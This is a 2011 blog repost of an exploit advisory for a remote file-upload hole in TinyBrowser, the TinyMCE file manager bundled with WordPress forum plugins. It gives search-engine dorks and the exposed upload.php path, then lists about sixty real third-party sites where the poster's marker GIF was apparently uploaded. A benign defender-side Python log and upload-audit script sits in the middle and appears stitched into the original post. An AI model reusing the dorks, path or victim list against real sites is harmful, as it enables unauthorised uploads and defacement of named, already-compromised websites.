.: Dee Personal Blog :.


TinyBrowser Remote File upload Vulnerability

Posted on July 20, 2011 at 11:20 AM


============================================

TinyBrowser Remote File upload Vulnerability

============================================


************************************************************

** TinyBrowser Remote File upload Vulnerability

************************************************************

** Product : TinyBrowser

** Home : www.dz4all.com/cc

** Vulnerability : Remote File upload

** Risk : High

** Dork : inurl:"tinybrowser.php?"

************************************************************

** Discovered by : Ra3cH

** From : Algeria

** Contact : [email protected]

** *********************************************************

************************************************************

** Dorks By Ra3cH

** http://[PATH]/tinybrowser/upload.php?type=

** Dorks By Dwl X-Cisadane

** For WordPress CMS : inurl:/tinybrowser/upload.php

** For Non-WordPress CMS/Others CMS : intitle:"TinyBrowser :: Upload

************************************************************

** Example:

** http://[site]/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/upload.php?type=

************************************************************



TinyBrowser is a component of TinyMCE (the editor used in many CMSes) that provides file management, for example file uploads. TinyBrowser is shipped with several CMSes, WordPress among them: one of the WordPress forum plugins uses TinyBrowser. Because of the upload vulnerability, an attacker can upload files such as images, text or HTML (depending on the site's configuration).
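As an added example from the defender's side (this is not part of the original advisory and not TinyBrowser's or WordPress's own code), the Python script below shows two checks an administrator could run after reading the above: scan the web server access log for requests that reach a PHP script under a `tinybrowser/` directory, such as the `upload.php` endpoint named in the advisory, and audit an upload directory for files whose leading bytes do not match the image type their extension claims (a `.gif` that is really HTML, as in the results listed further down). The log lines, file names and file contents are constructed for the example; the log format is assumed to be Apache/nginx "combined".

```python
"""Defender-side checks for an exposed TinyBrowser upload endpoint.

1. scan_access_log(): which clients reached a PHP script under /tinybrowser/.
2. audit_uploads(): which files in an upload directory are not the image type
   their extension promises (permissive upload filters usually fail here).

All sample data is constructed for this example; the log format is assumed
to be the Apache/nginx "combined" format.
"""
import re
from dataclasses import dataclass

# Combined log format, reduced to the fields the check needs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Any PHP script under a tinybrowser/ directory (covers upload.php from the advisory).
TINYBROWSER_PHP = re.compile(r'/tinybrowser/[^?\s]*\.php', re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    path: str
    status: str


def scan_access_log(lines):
    """Return one Finding per request that hit a TinyBrowser PHP script."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash
        if TINYBROWSER_PHP.search(m.group("path")):
            findings.append(Finding(**m.groupdict()))
    return findings


# Leading bytes ("magic") of the image formats an upload dir is expected to hold.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def content_mismatch(filename, head):
    """True if the extension is not an allowed image type, or the bytes do not match it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return True
    return not any(head.startswith(sig) for sig in MAGIC[ext])


def audit_uploads(files):
    """files: mapping of filename -> first bytes of the file. Returns sorted offenders."""
    return sorted(name for name, head in files.items() if content_mismatch(name, head))


# Constructed sample input (RFC 5737 documentation addresses, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jul/2011:11:20:01 +0000] "GET /wp-content/plugins/simple-forum/'
    'editors/tinymce/plugins/tinybrowser/upload.php?type=image HTTP/1.1" 200 1532',
    '203.0.113.5 - - [20/Jul/2011:11:20:07 +0000] "POST /wp-content/plugins/simple-forum/'
    'editors/tinymce/plugins/tinybrowser/upload.php HTTP/1.1" 200 210',
    '198.51.100.9 - - [20/Jul/2011:11:21:00 +0000] "GET /index.php HTTP/1.1" 200 8820',
    'this line does not match the log format',
]

SAMPLE_FILES = {
    "photo.gif": b"GIF89a\x01\x00\x01\x00",                 # real GIF
    "suspect.gif": b"<html><body>not an image</body></html>",  # HTML named .gif
    "logo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",      # real PNG
    "notes.txt": b"plain text",                               # not an allowed type
}

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.method} {f.path} -> {f.status}")
    print("files failing the image check:", audit_uploads(SAMPLE_FILES))
```

In practice the audit would read the first 16 bytes of each file in the real upload directory (for example `wp-content/forum-image-uploads/`) and feed them to `audit_uploads`; any hit is a candidate for removal and a sign that the upload endpoint needs to be disabled or put behind authentication.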



Results (combined WordPress & non-WordPress)

http://writers-well.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.mosoq-ayllu.org.pe/wp-content/forum-image-uploads//x-cisadane.gif

http://www.britishfencing.com/uploads/images/x-cisadane.gif

http://www.abracadabrasocialmedia.com/new/wp-content/forum-image-uploads//x-cisadane.gif

http://www.suwwweb.com/como/images/stories/x-cisadane.gif

http://www.onlinechessapp.com/blog/wp-content/forum-image-uploads//x-cisadane.gif

http://dmlmortgage.com/useruploads/images/x-cisadane.gif

http://www.speedfeet.org/wp-content/forum-image-uploads//x-cisadane.gif

http://qbicamphawa.com/upload/users/image/x-cisadane.gif


http://www.keithjarrett.org/wp-content/forum-image-uploads//x-cisadane.gif

http://ci.wheeler.or.us/wp-content/forum-image-uploads//x-cisadane.gif

http://www.portlandoic.org/useruploads/images/x-cisadane.gif

http://www.colegioamparosurubim.com.br/uploads/images/x-cisadane.gif

http://oh-stickers.com/Ohblogdeco/wp-content/forum-image-uploads//x-cisadane.gif

http://www.bookgenie.in/useruploads/images/x-cisadane.gif

http://www.messofmusic.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.swoopers.org/wp-content/forum-image-uploads//x-cisadane.gif

http://caravanstv.com/members/wp-content/forum-image-uploads//x-cisadane.gif

http://www.handmadenews.org/hmnul/images/x-cisadane.gif

http://www.2d6.org/wp-content/forum-image-uploads//x-cisadane.gif

http://www.votreregard.fr/forum/wp-content/forum-image-uploads//x-cisadane.gif

http://longmontledger.com/wp-content/forum-image-uploads//x-cisadane.gif

http://reelsaltfish.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.oksup.com/wp-content/forum-image-uploads//x-cisadane.gif

http://menofthewestguild.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.shawnwilkes.com/wp-content/plugins/simple-forum/forum/image-uploads//x-cisadane.gif

http://www.mojacarsol.com/static/fotos/contenido/x-cisadane.gif

http://scottishcoastalrowing.org/wp-content/forum-image-uploads//x-cisadane.gif

http://full-draw.com/wp-content/forum-image-uploads//x-cisadane.gif

http://1nwliving.com/useruploads/images/x-cisadane.gif

http://www.wavers.it/wp-content/forum-image-uploads//x-cisadane.gif

http://www.oakseedessaycontest.com/wp-content/forum-image-uploads//x-cisadane.gif

http://backcountryskiingcanada.com/forums/wp-content/forum-image-uploads//x-cisadane.gif

http://www.banphemarket.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.fenysziget.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.candytreez.com/main/wp-content/forum-image-uploads//x-cisadane.gif

http://battocentre.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.bnaichayim.com/site/wp-content/forum-image-uploads//x-cisadane.gif

http://stripshow.monkeylaw.org/wp-content/forum-image-uploads/x-cisadane.gif

http://gbefraternity.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.faraak.sk/wp-content/forum-image-uploads/x-cisadane.gif

http://www.ankarabote.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.id-pixel.net/xiiijapan/newblog2/wp-content/forum-image-uploads//x-cisadane.gif

http://www.bilardshop.pl/bilardshop/uploads/x-cisadane.gif

http://www.nvshv.nl/seh/upload/Image/x-cisadane.gif

http://dotwa.org.au/wp-content/forum-image-uploads//x-cisadane.gif

http://www.utopod.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.montanhismocaparao.com.br/upload/image/x-cisadane.gif

http://www.olar-group.ro/images/imguploads/x-cisadane.gif

http://www.ivetijardovica.hr/wp-content/forum-image-uploads//x-cisadane.gif

http://www.amarantbakkers.nl/useruploads/images/x-cisadane.gif

http://www.damnes.be/wp-content/forum-image-uploads//x-cisadane.gif

http://dkbmuraszemenye.hu/wp-content/forum-image-uploads//x-cisadane.gif

http://neja.si/wp-content/forum-image-uploads//x-cisadane.gif

http://www.elperiodico.com.co/x-cisadane.gif

http://www.mandinga.ro/images/imguploads/x-cisadane.gif

http://rg-fails.iz.rs/wp-content/forum-image-uploads//x-cisadane.gif

http://www.funerali.org/wp-content/forum-image-uploads//x-cisadane.gif

http://www.termopanebuftea.ro/images/imguploads/x-cisadane.gif

http://matricazz.hu/files/images/x-cisadane.gif

http://www.irscl.com/president/wp-content/forum-image-uploads//x-cisadane.gif



Reference : http://1337day.com/exploits/12340

Categories: Exploit
